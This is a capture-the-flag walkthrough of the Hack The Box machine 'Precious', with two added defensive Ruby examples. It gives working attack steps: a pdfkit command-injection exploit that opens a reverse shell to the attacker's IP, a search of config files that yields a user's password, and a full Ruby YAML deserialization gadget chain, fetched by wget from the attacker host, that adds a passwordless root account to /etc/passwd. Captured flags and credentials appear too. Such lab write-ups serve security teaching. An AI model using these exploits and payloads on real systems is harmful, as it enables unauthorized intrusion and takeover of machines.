Contents
Connect to the HTB server and start the target machine
Scan the target's TCP ports with nmap
Access port 80 on the target with curl
Brute-force subdomains with ffuf
Visit the domain in a browser
Check the domain's response headers with curl
Inspect the PDF's metadata with exiftool
Lateral movement
USER_FLAG: adf5793a876a190f0c08b3b6247cec32
Privilege escalation
ROOT_FLAG: f1f5fd20bc4c3cdfae0299947296fbb6
Connect to the HTB server and start the target machine
Target IP: 10.10.11.189
Attacker IP (assigned): 10.10.16.7

Use nmap to scan the target's TCP ports for open ports
nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.11.189

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.11.189
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 23:24 EST
Warning: 10.10.11.189 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.11.189 (10.10.11.189)
Host is up (0.15s latency).
Not shown: 65507 closed tcp ports (reset), 26 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 46.17 seconds

Run nmap again against ports 22 and 80 with script and service detection
nmap -p 22,80 -sCV 10.10.11.189

Use curl to access port 80 on the target
curl -I http://10.10.11.189:80

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://10.10.11.189:80
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.18.0
Date: Sun, 10 Nov 2024 05:20:11 GMT
Content-Type: text/html
Content-Length: 145
Connection: keep-alive
Location: http://precious.htb/

Bind the domain to the target IP
echo "10.10.11.189 precious.htb" >> /etc/hosts

Brute-force subdomains with ffuf
ffuf -u http://precious.htb/ -H "Host: FUZZ.precious.htb" -w ../dictionary/subdomains-top20000.txt -t 200 -fc 302

Then fuzz paths on the domain with ffuf
ffuf -u http://precious.htb/FUZZ -w ../dictionary/Common-dir.txt -t 200 -fc 302

Visit the domain in a browser
The page is simply a form for submitting a URL to the target; apart from that there is no other useful information.
Check the domain's response headers with curl
curl -I http://precious.htb/

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://precious.htb/
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Content-Length: 483
Connection: keep-alive
Status: 200 OK
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Date: Sun, 10 Nov 2024 06:06:21 GMT
X-Powered-By: Phusion Passenger(R) 6.0.15
Server: nginx/1.18.0 Phusion Passenger(R) 6.0.15
X-Runtime: Ruby

The response carries an "X-Runtime: Ruby" header, so the page is very likely written in Ruby.
Create a test.txt file locally

echo "This is a test text" > test.txt
Start an HTTP server with Python

python -m http.server 7777
Submit the URL of test.txt to the target so that it downloads the file. After clicking Submit, the conversion succeeds.

Inspect the PDF's metadata with exiftool
.\exiftool.exe .\vxwb2a1xjsyl4ljfe7saqov548euun2v.pdf

Search searchsploit for the keyword pdfkit
searchsploit pdfkit

The version covered by this exploit matches what we need for this target.
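Before going further with the exploit, it is worth seeing what the fix looks like on the application side. The following Ruby is an added example, not code from the writeup and not pdfkit's own code. Upgrading pdfkit to a version that fixes CVE-2022-25765 is the primary control; independently of that, a URL a user submits for rendering should be validated against a strict allowlist and handed to the converter as an argv array rather than embedded in a shell string. The validation rules, the names validate_render_url, converter_argv and render_command_for, the wkhtmltopdf invocation and the /tmp/out.pdf output path are all assumptions of this example.

```ruby
require "uri"

# Added example: server-side validation of a user-supplied URL before an
# HTML-to-PDF conversion. Not the writeup's code and not pdfkit's code.
ALLOWED_SCHEMES = %w[http https].freeze
MAX_URL_LENGTH  = 2048

# Conservative allowlist: letters, digits and the URI punctuation needed for
# ordinary links. Space, quotes, backticks, $, ;, |, <, > and parentheses are
# all absent, so they never reach anything downstream.
SAFE_CHARS = %r{\A[A-Za-z0-9\-._~:/?#@%=&+,]+\z}

# Returns [:ok, normalized_url] or [:error, reason].
def validate_render_url(input)
  return [:error, "empty"] if input.nil? || input.empty?
  return [:error, "too long"] if input.length > MAX_URL_LENGTH
  return [:error, "unexpected characters"] unless input.match?(SAFE_CHARS)

  uri = URI.parse(input)
  return [:error, "scheme must be http or https"] unless ALLOWED_SCHEMES.include?(uri.scheme)
  return [:error, "missing host"] if uri.host.nil? || uri.host.empty?
  return [:error, "userinfo not allowed"] unless uri.userinfo.nil?

  [:ok, uri.to_s]
rescue URI::InvalidURIError
  [:error, "unparseable"]
end

# Builds the converter command as an argv array (assumed wkhtmltopdf invocation;
# the output path is a placeholder). Passing an array to Process.spawn or Open3
# means no shell is involved, so no part of the URL is ever parsed as shell syntax.
def converter_argv(validated_url, output_path = "/tmp/out.pdf")
  ["wkhtmltopdf", validated_url, output_path]
end

# Glue: validate first, only then build the command. Returns nil on rejection.
def render_command_for(user_input)
  status, value = validate_render_url(user_input)
  return nil unless status == :ok
  converter_argv(value)
end

if __FILE__ == $0
  # Constructed sample inputs: one acceptable URL and three that must be rejected.
  ["http://example.com/report?id=7", "file:///etc/passwd",
   "http://example.com/a b", "http://user:pw@example.com/"].each do |u|
    p [u, validate_render_url(u)]
  end
end
```

The allowlist deliberately rejects more than RFC 3986 allows (no parentheses, quotes or dollar signs), because the goal is defence in depth for a string that ends up in another process's argument list; callers that need those characters must percent-encode them.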
Copy the exploit into the current directory
searchsploit -m 51293.py

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 51293.py
  Exploit: pdfkit v0.8.7.2 - Command Injection
      URL: https://www.exploit-db.com/exploits/51293
     Path: /usr/share/exploitdb/exploits/ruby/local/51293.py
    Codes: CVE-2022–25765
 Verified: True
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/kali/Desktop/temp/51293.py

Check which parameters the exploit requires. Use Yakit to capture the POST parameters of the submission. Start an nc listener locally.
nc -lvnp 1425
Get a reverse shell with the exploit
python 51293.py -s 10.10.16.7 1425 -w http://precious.htb -p url

The local nc listener receives the connection

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.189] 45250
whoami
ruby

Lateral movement
Upgrade the TTY

script -c /bin/bash -q /dev/null
List the users on the system

cat /etc/passwd

Users with a login shell: root, henry, ruby
Change to the /tmp directory

cd /tmp
Find every file whose name contains "conf" and save the output to res.txt

find / -name "*conf*" -type f 2>/dev/null | tee res.txt
Read each file listed in res.txt line by line and grep for "henry"

cat res.txt | xargs -I {} sh -c "cat {}" | grep henry

ruby@precious:/tmp$ cat rex.txt | xargs -I {} sh -c "cat {}" | grep henry
cat rex.txt | xargs -I {} sh -c "cat {}" | grep henry
Value: henry
Value: henry
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"

This gives us henry's credentials: user henry, password Q3c1AqGHtoI0aXAYFH. Log in to the target over SSH with these credentials.
ssh henry@10.10.11.189

Locate user.txt and read it

henry@precious:~$ find / -name user.txt 2>/dev/null
/home/henry/user.txt
henry@precious:~$ cat /home/henry/user.txt
adf5793a876a190f0c08b3b6247cec32

USER_FLAG: adf5793a876a190f0c08b3b6247cec32

Privilege escalation
Check which commands the current user may run with elevated privileges

sudo -l

henry@precious:~$ sudo -l
Matching Defaults entries for henry on precious:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb

View the contents of update_dependencies.rb
cat /opt/update_dependencies.rb
# Compare installed dependencies with those specified in dependencies.yml
require "yaml"
require "rubygems"

# TODO: update versions automatically
def update_gems()
end

def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by { |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if(file_name == local_name)
            if(file_version != local_version)
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end
A brief code audit shows that this Ruby script compares the versions of the locally installed gems with the versions listed in dependencies.yml. The YAML read caught my attention: the file is opened by a relative name rather than an absolute path, which means that when we run the privileged command, the file is looked up in whatever directory we run the command from.
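Seen from the defender's side, the script has two separate weaknesses: the file location depends on the caller's working directory, and YAML.load will instantiate whatever Ruby objects the document's tags name. The following is an added example of a hardened rewrite of the same comparison (my code, not the script from the target or from any project). It resolves dependencies.yml from a fixed directory, parses it with YAML.safe_load so that any !ruby/object or !ruby/module tag raises Psych::DisallowedClass instead of building an object, and checks the shape of the data before using it. The /opt/sample directory, the function names and the constructed sample YAML are assumptions of this example.

```ruby
require "yaml"

# Added example, not the script from the target: a hardened version of the
# dependency comparison. The directory is fixed (an assumption for this example)
# instead of being whatever directory the script happens to be run from.
DEPENDENCIES_DIR = "/opt/sample".freeze
VERSION_RE = /\A\d+(\.\d+)*\z/

# Absolute path of the YAML file, independent of the current working directory.
def dependencies_path(dir = DEPENDENCIES_DIR)
  File.join(dir, "dependencies.yml")
end

# safe_load only builds plain scalars, arrays and hashes; a tagged Ruby object
# raises Psych::DisallowedClass instead of instantiating a class. The result is
# then checked to be a mapping of gem name => version string.
def load_dependencies(yaml_text)
  data = YAML.safe_load(yaml_text, permitted_classes: [], aliases: false)
  raise ArgumentError, "dependencies.yml must be a mapping" unless data.is_a?(Hash)

  data.each_with_object({}) do |(name, version), out|
    version = version.to_s # an unquoted 1.0 parses as a Float; normalise to text
    unless name.is_a?(String) && name.match?(/\A[A-Za-z0-9_\-]+\z/) && version.match?(VERSION_RE)
      raise ArgumentError, "bad entry #{name.inspect} => #{version.inspect}"
    end
    out[name] = version
  end
end

# Same comparison as the original script, but returning a result hash instead of
# printing. local_gems is an array of [name, version] pairs, as produced by
# Gem::Specification; it is passed in so the logic can be exercised without a gem set.
def compare_versions(file_gems, local_gems)
  local = local_gems.to_h
  file_gems.each_with_object({}) do |(name, wanted), out|
    installed = local[name]
    out[name] = if installed.nil? then :not_installed
                elsif installed == wanted then :same
                else :differs
                end
  end
end

if __FILE__ == $0
  path = dependencies_path
  # Constructed fallback so the example also runs where /opt/sample does not exist.
  text = File.exist?(path) ? File.read(path) : "yaml: 0.1.1\npdfkit: 0.8.6\n"
  local = Gem::Specification.sort_by { |g| [g.name.downcase, g.version] }
                            .map { |g| [g.name, g.version.to_s] }
  compare_versions(load_dependencies(text), local).each { |name, status| puts "#{name}: #{status}" }
end
```

Because the script is run as root through sudo, the second change matters even with a fixed path: a root-writable file is not the only way a parser reaches hostile input, and safe_load costs nothing for a file that only ever holds name: version pairs.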
Locate the file

henry@precious:/opt/sample$ find / -name dependencies.yml 2>/dev/null
/opt/sample/dependencies.yml

Check the file's permissions
ls -l /opt/sample/dependencies.yml

henry@precious:/opt/sample$ ls -l /opt/sample/dependencies.yml
-rw-r--r-- 1 root root 26 Sep 22  2022 /opt/sample/dependencies.yml

View the file's contents
cat /opt/sample/dependencies.yml

henry@precious:/opt/sample$ cat /opt/sample/dependencies.yml
yaml: 0.1.1
pdfkit: 0.8.6

I searched online for how Ruby's YAML.load can be made to execute commands. According to the article I found, the following payload leads to RCE:

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: abc
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module Kernel
                 method_id: :system
             git_set: id
         method_id: :resolve

On my attacking machine I create a new dependencies.yml and, through the command execution, try to add a passwordless administrator user named 0dayhp
echo 0dayhp::0:0:0dayhp:/root:/bin/bash >> /etc/passwd

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: abc
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module Kernel
                 method_id: :system
             git_set: echo 0dayhp::0:0:0dayhp:/root:/bin/bash >> /etc/passwd
         method_id: :resolve

Start an HTTP server locally with Python
python -m http.server 7777
On the target, change to /tmp and download the file
wget http://10.10.16.7:7777/dependencies.yml -O dependencies.yml
Run the passwordless privileged command directly with sudo

henry@precious:/tmp$ sudo /usr/bin/ruby /opt/update_dependencies.rb
sh: 1: reading: not found
Traceback (most recent call last):
	33: from /opt/update_dependencies.rb:17:in main
	32: from /opt/update_dependencies.rb:10:in list_from_file
	31: from /usr/lib/ruby/2.7.0/psych.rb:279:in load
	30: from /usr/lib/ruby/2.7.0/psych/nodes/node.rb:50:in to_ruby
	29: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:32:in accept
	28: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:6:in accept
	27: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:16:in visit
	26: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:313:in visit_Psych_Nodes_Document
	25: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:32:in accept
	24: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:6:in accept
	23: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:16:in visit
	22: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:141:in visit_Psych_Nodes_Sequence
	21: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:332:in register_empty
	20: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:332:in each
	19: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:332:in block in register_empty
	18: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:32:in accept
	17: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:6:in accept
	16: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:16:in visit
	15: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:208:in visit_Psych_Nodes_Mapping
	14: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:394:in revive
	13: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:402:in init_with
	12: from /usr/lib/ruby/vendor_ruby/rubygems/requirement.rb:218:in init_with
	11: from /usr/lib/ruby/vendor_ruby/rubygems/requirement.rb:214:in yaml_initialize
	10: from /usr/lib/ruby/vendor_ruby/rubygems/requirement.rb:299:in fix_syck_default_key_in_requirements
	 9: from /usr/lib/ruby/vendor_ruby/rubygems/package/tar_reader.rb:59:in each
	 8: from /usr/lib/ruby/vendor_ruby/rubygems/package/tar_header.rb:101:in from
	 7: from /usr/lib/ruby/2.7.0/net/protocol.rb:152:in read
	 6: from /usr/lib/ruby/2.7.0/net/protocol.rb:319:in LOG
	 5: from /usr/lib/ruby/2.7.0/net/protocol.rb:464:in
	 4: from /usr/lib/ruby/2.7.0/net/protocol.rb:458:in write
	 3: from /usr/lib/ruby/vendor_ruby/rubygems/request_set.rb:388:in resolve
	 2: from /usr/lib/ruby/2.7.0/net/protocol.rb:464:in
	 1: from /usr/lib/ruby/2.7.0/net/protocol.rb:458:in write
/usr/lib/ruby/2.7.0/net/protocol.rb:458:in system: no implicit conversion of nil into String (TypeError)

View the contents of /etc/passwd
cat /etc/passwd

The line has been successfully appended to /etc/passwd
Switch to the 0dayhp user
su 0dayhp

henry@precious:/tmp$ su 0dayhp
root@precious:/tmp# whoami
root

Locate root.txt and read it

root@precious:/tmp# find / -name root.txt
/root/root.txt
root@precious:/tmp# cat /root/root.txt
f1f5fd20bc4c3cdfae0299947296fbb6

ROOT_FLAG: f1f5fd20bc4c3cdfae0299947296fbb6